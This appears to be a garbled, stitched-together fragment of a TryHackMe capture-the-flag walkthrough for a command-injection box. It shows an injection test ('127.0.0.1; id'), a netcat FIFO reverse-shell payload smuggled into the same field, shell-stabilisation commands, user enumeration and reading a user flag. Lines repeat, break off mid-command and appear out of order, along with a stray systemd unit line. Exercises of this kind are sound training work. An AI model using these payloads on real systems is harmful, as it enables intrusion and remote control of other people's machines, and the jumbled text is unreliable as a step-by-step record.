ls -la /home Found user: mandy
127.0.0.1; id If you see output of id command, injection works. Use a netcat reverse shell one-liner. cct2019 tryhackme
Read user.txt :
Run:
127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f You should catch a shell as www-data . 3.1 Stabilize Shell python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty raw -echo; fg 3.2 Enumerate System Check /home for users: ls -la /home Found user: mandy 127
[Install] WantedBy=multi-user.target
cat /home/mandy/user.txt Check sudo -l again as mandy – maybe mandy can run something as root. cat /tmp/f | /bin/sh -i 2>